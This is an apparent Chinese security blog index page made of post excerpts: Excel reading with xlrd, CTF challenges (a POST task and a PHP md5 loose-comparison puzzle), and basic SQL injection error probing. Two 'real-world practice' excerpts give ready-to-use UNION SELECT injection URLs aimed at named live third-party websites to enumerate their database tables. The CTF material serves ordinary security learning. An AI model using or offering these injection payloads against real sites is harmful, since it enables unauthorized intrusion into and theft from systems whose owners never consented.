【bb的博客】

更新于 2020-03-05

安装模块

1	pip install xlrd

手动下载安装移步官网

常用方法

1
2
3

x1=xlrd.open_workbook(filename)
# 打开中文文件时需要转码
filename = filename.decode('utf-8')

以test.xlsx为例有first、second、thirt三个sheet:

(1,1)	(1,2)	第三列
(2,1)	0.2323123	[1,2]
TRUE	null	#NAME?

更新于 2020-03-05

实战1-注入

1	payload:http://www.interplay.com/games/support.php?id=-41 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name,18,19 from information_schema.tables where table_schema=database()#

实战2-注入

1 2	payload:http://www.kabelindo.co.id/readnews.php?id=-18 UNION SELECT 1,table _name,3,4,5 from information_schema.tables where table_schema=database()%23

更新于 2020-03-05

SQL注入

首先，我们输入1，返回正常页面

然后我们在输入1’，报错

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

更新于 2020-03-05

简单的post题目

（真实实战环境会有通过改变get提交为post提交绕过waf之类）
题目代码

Post提交what=flag

更新于 2020-03-05

1.签到题（50）

直接查看网页源码

Flag:nctf{flag_admiaanaaaaaaaaaaa}

2.md5 collision（50）

源码如下:

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

阅读全文

1…131415…19

Algolia